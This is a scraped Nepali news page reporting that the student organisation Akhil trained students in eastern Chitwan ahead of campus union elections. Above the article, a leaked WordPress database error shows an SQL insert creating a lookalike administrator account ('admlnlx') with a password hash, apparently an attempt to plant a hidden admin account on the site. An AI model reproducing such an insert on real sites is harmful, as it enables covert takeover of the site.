WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BOlFLVT/tK.femkMPraB/jBFDkjrIk1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-02 07:41:56', '', 'admlnlx', 'admlnlx')
चितवन,माघ १७-
त्रिविले स्ववियूको कार्यतालीका सार्वजनिक गरेपछि चितवनका विद्यार्थी संगठन चुनावको तयारीलाई तिव्रता दिन थालेका छन् ।अखिल चितवनले आइतवार पुर्वी चितवनका विद्यार्थीको भेला गरेर प्रशिक्षण दिएको छ । प्रशिक्षणमा अखिल केन्द्रिय निर्वाचन आयोगका सदस्य स्वरुप सुयालले यसपटकको स्ववियु निर्वाचनमा अखिलको जित सुनिश्चित भएको छ ।उहांले चुनाव जित्ने गरि गतिविधि संचालन गर्न विद्यार्थीलाई आग्रह गर्नुभयो ।
यस्तै अखिल चितवनका अध्यक्ष देव पाठकले सवै कलेजमा अखिल विजयी हुने गरि विद्यार्थीमाझ जान निर्देशन दिनुभएको छ ।उहांले सधै विद्यार्थीको मुद्धामा केन्द्रित हुने अखिलले चुनावमा पनि विद्यार्थी मुद्धा समेट्न सक्नेगरी जानुपर्ने वताउनु भयो ।
कार्यक्रममा अखिलका जिल्ला तहका नेता तथा विद्यार्थीको सहभागिता रहेको थियो ।कार्यक्रम क्षेत्र नः १ का अध्यक्ष प्रकाश कलाखेतीको
अध्यक्षतामा सम्पन्न भएको हो ।